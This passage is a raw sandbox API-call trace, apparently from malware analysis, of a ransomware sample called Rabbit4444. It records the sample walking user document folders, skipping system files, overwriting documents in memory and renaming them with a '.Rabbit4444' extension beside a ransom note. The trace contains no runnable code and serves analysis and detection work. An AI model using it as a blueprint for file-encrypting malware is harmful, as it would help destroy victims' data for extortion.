[0049.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0049.876] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14118673464) returned 1 [0049.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0049.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0049.876] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.877] CloseHandle (hObject=0x298) returned 1 [0049.877] CloseHandle (hObject=0x278) returned 1 [0049.877] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\fHQ QkkX1TmC5OV.pdf.Rabbit4444") returned 76 [0049.877] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\fHQ QkkX1TmC5OV.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\fhq qkkx1tmc5ov.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\fHQ QkkX1TmC5OV.pdf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\fhq qkkx1tmc5ov.pdf.rabbit4444"), dwFlags=0x1) returned 1 [0049.878] InterlockedExchangeAdd (in: Addend=0xff618, Value=48208 | out: Addend=0xff618) returned 23792672 [0049.878] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3714 [0049.878] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f80f90, ftCreationTime.dwHighDateTime=0x1d4cf78, ftLastAccessTime.dwLowDateTime=0x167948b0, ftLastAccessTime.dwHighDateTime=0x1d4d4ea, ftLastWriteTime.dwLowDateTime=0x167948b0, ftLastWriteTime.dwHighDateTime=0x1d4d4ea, nFileSizeHigh=0x0, nFileSizeLow=0x1277d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mqnlW3rVySKpkYtm8O.odt", cAlternateFileName="MQNLW3~1.ODT")) returned 1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2="Rabbit4444.exe") returned -1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2=".") returned 1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2="..") returned 1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2="windows") returned -1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2="bootmgr") returned 1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2="pagefile.sys") returned -1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2="boot") returned 1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2="ids.txt") returned 1 [0049.878] lstrcmpiW (lpString1="mqnlW3rVySKpkYtm8O.odt", lpString2="NTUSER.DAT") returned -1 [0049.878] lstrcpyW (in: lpString1=0x130eb94, lpString2="mqnlW3rVySKpkYtm8O.odt" | out: lpString1="mqnlW3rVySKpkYtm8O.odt") returned="mqnlW3rVySKpkYtm8O.odt" [0049.878] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\mqnlW3rVySKpkYtm8O.odt", dwFileAttributes=0x0) returned 1 [0049.878] lstrlenW (lpString="mqnlW3rVySKpkYtm8O.odt") returned 22 [0049.878] lstrlenW (lpString="Rabbit4444") returned 10 [0049.879] lstrcmpiW (lpString1="kYtm8O.odt", lpString2="Rabbit4444") returned -1 [0049.879] lstrlenW (lpString=".dll") returned 4 [0049.879] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0049.879] lstrlenW (lpString=".lnk") returned 4 [0049.879] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0049.879] lstrlenW (lpString=".ini") returned 4 [0049.879] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0049.879] lstrlenW (lpString=".sys") returned 4 [0049.879] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0049.879] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\mqnlW3rVySKpkYtm8O.odt" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\mqnlw3rvyskpkytm8o.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.879] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.879] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14118967595) returned 1 [0049.879] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=75645) returned 1 [0049.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0049.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0049.879] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12a80, lpName=0x0) returned 0x298 [0049.879] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12a80) returned 0x70000 [0049.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0049.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0049.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.881] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14119221523) returned 1 [0049.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0049.882] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0049.882] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.882] CloseHandle (hObject=0x298) returned 1 [0049.882] CloseHandle (hObject=0x278) returned 1 [0049.883] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\mqnlW3rVySKpkYtm8O.odt.Rabbit4444") returned 79 [0049.883] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\mqnlW3rVySKpkYtm8O.odt" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\mqnlw3rvyskpkytm8o.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\mqnlW3rVySKpkYtm8O.odt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\mqnlw3rvyskpkytm8o.odt.rabbit4444"), dwFlags=0x1) returned 1 [0049.883] InterlockedExchangeAdd (in: Addend=0xff618, Value=75648 | out: Addend=0xff618) returned 23840880 [0049.884] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3716 [0049.884] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b293500, ftCreationTime.dwHighDateTime=0x1d4c904, ftLastAccessTime.dwLowDateTime=0xf7f49a60, ftLastAccessTime.dwHighDateTime=0x1d4cc11, ftLastWriteTime.dwLowDateTime=0xf7f49a60, ftLastWriteTime.dwHighDateTime=0x1d4cc11, nFileSizeHigh=0x0, nFileSizeLow=0x18d65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OL28qnWw4 WVd5.pdf", cAlternateFileName="OL28QN~1.PDF")) returned 1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2="Rabbit4444.exe") returned -1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2=".") returned 1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2="..") returned 1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2="windows") returned -1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2="bootmgr") returned 1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2="pagefile.sys") returned -1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2="boot") returned 1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2="ids.txt") returned 1 [0049.884] lstrcmpiW (lpString1="OL28qnWw4 WVd5.pdf", lpString2="NTUSER.DAT") returned 1 [0049.884] lstrcpyW (in: lpString1=0x130eb94, lpString2="OL28qnWw4 WVd5.pdf" | out: lpString1="OL28qnWw4 WVd5.pdf") returned="OL28qnWw4 WVd5.pdf" [0049.884] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\OL28qnWw4 WVd5.pdf", dwFileAttributes=0x0) returned 1 [0049.884] lstrlenW (lpString="OL28qnWw4 WVd5.pdf") returned 18 [0049.884] lstrlenW (lpString="Rabbit4444") returned 10 [0049.884] lstrcmpiW (lpString1="4 WVd5.pdf", lpString2="Rabbit4444") returned -1 [0049.884] lstrlenW (lpString=".dll") returned 4 [0049.884] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.884] lstrlenW (lpString=".lnk") returned 4 [0049.884] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0049.884] lstrlenW (lpString=".ini") returned 4 [0049.884] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0049.884] lstrlenW (lpString=".sys") returned 4 [0049.884] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0049.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\OL28qnWw4 WVd5.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\ol28qnww4 wvd5.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.885] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.885] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14119539119) returned 1 [0049.885] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=101733) returned 1 [0049.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0049.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0049.885] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x19070, lpName=0x0) returned 0x298 [0049.885] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19070) returned 0x70000 [0049.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0049.888] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14119894585) returned 1 [0049.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0049.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0049.888] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.889] CloseHandle (hObject=0x298) returned 1 [0049.889] CloseHandle (hObject=0x278) returned 1 [0049.891] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\OL28qnWw4 WVd5.pdf.Rabbit4444") returned 75 [0049.891] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\OL28qnWw4 WVd5.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\ol28qnww4 wvd5.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\OL28qnWw4 WVd5.pdf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\ol28qnww4 wvd5.pdf.rabbit4444"), dwFlags=0x1) returned 1 [0049.891] InterlockedExchangeAdd (in: Addend=0xff618, Value=101744 | out: Addend=0xff618) returned 23916528 [0049.891] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3718 [0049.891] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b293500, ftCreationTime.dwHighDateTime=0x1d4c904, ftLastAccessTime.dwLowDateTime=0xf7f49a60, ftLastAccessTime.dwHighDateTime=0x1d4cc11, ftLastWriteTime.dwLowDateTime=0xf7f49a60, ftLastWriteTime.dwHighDateTime=0x1d4cc11, nFileSizeHigh=0x0, nFileSizeLow=0x18d65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OL28qnWw4 WVd5.pdf", cAlternateFileName="OL28QN~1.PDF")) returned 0 [0049.892] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0049.892] lstrcpyW (in: lpString1=0x130eb94, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.892] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.892] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.893] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.893] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.894] CloseHandle (hObject=0x278) returned 1 [0049.894] CloseHandle (hObject=0x27c) returned 1 [0049.894] GetCurrentThreadId () returned 0xd98 [0049.894] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0049.894] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9" [0049.894] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10cd98 | out: hHeap=0xe0000) returned 1 [0049.894] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0049.894] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9" [0049.894] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\" [0049.894] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\.BFC0E91B00AE8A0620D3" [0049.894] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.895] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.898] FlushFileBuffers (hFile=0x27c) returned 1 [0049.899] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.899] CloseHandle (hObject=0x27c) returned 1 [0049.899] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9") returned 38 [0049.899] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.899] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77ffd710, ftCreationTime.dwHighDateTime=0x1d4cf91, ftLastAccessTime.dwLowDateTime=0xc7c8cad0, ftLastAccessTime.dwHighDateTime=0x1d4ce8e, ftLastWriteTime.dwLowDateTime=0xe71086a4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0049.899] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.899] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.899] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.899] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.899] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77ffd710, ftCreationTime.dwHighDateTime=0x1d4cf91, ftLastAccessTime.dwLowDateTime=0xc7c8cad0, ftLastAccessTime.dwHighDateTime=0x1d4ce8e, ftLastWriteTime.dwLowDateTime=0xe71086a4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.900] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.900] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.900] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.900] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.900] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.900] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe71086a4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe71086a4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe71086a4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.900] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.900] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.900] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x769c9500, ftCreationTime.dwHighDateTime=0x1d4d45c, ftLastAccessTime.dwLowDateTime=0xc527a4b0, ftLastAccessTime.dwHighDateTime=0x1d4c62b, ftLastWriteTime.dwLowDateTime=0xc527a4b0, ftLastWriteTime.dwHighDateTime=0x1d4c62b, nFileSizeHigh=0x0, nFileSizeLow=0x10235, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DKUItMdMv.csv", cAlternateFileName="DKUITM~1.CSV")) returned 1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2="Rabbit4444.exe") returned -1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2=".") returned 1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2="..") returned 1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2="windows") returned -1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2="bootmgr") returned 1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2="pagefile.sys") returned -1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2="boot") returned 1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2="ids.txt") returned -1 [0049.900] lstrcmpiW (lpString1="DKUItMdMv.csv", lpString2="NTUSER.DAT") returned -1 [0049.900] lstrcpyW (in: lpString1=0x130eb86, lpString2="DKUItMdMv.csv" | out: lpString1="DKUItMdMv.csv") returned="DKUItMdMv.csv" [0049.900] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\DKUItMdMv.csv", dwFileAttributes=0x0) returned 1 [0049.900] lstrlenW (lpString="DKUItMdMv.csv") returned 13 [0049.900] lstrlenW (lpString="Rabbit4444") returned 10 [0049.900] lstrcmpiW (lpString1="ItMdMv.csv", lpString2="Rabbit4444") returned -1 [0049.900] lstrlenW (lpString=".dll") returned 4 [0049.900] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0049.901] lstrlenW (lpString=".lnk") returned 4 [0049.901] lstrcmpiW (lpString1=".csv", lpString2=".lnk") returned -1 [0049.901] lstrlenW (lpString=".ini") returned 4 [0049.901] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0049.901] lstrlenW (lpString=".sys") returned 4 [0049.901] lstrcmpiW (lpString1=".csv", lpString2=".sys") returned -1 [0049.901] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\DKUItMdMv.csv" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\dkuitmdmv.csv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.901] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.901] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14121161642) returned 1 [0049.901] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=66101) returned 1 [0049.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0049.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0049.901] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10540, lpName=0x0) returned 0x298 [0049.901] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10540) returned 0x70000 [0049.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.903] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.903] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.903] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.903] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.903] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14121405977) returned 1 [0049.903] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0049.903] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 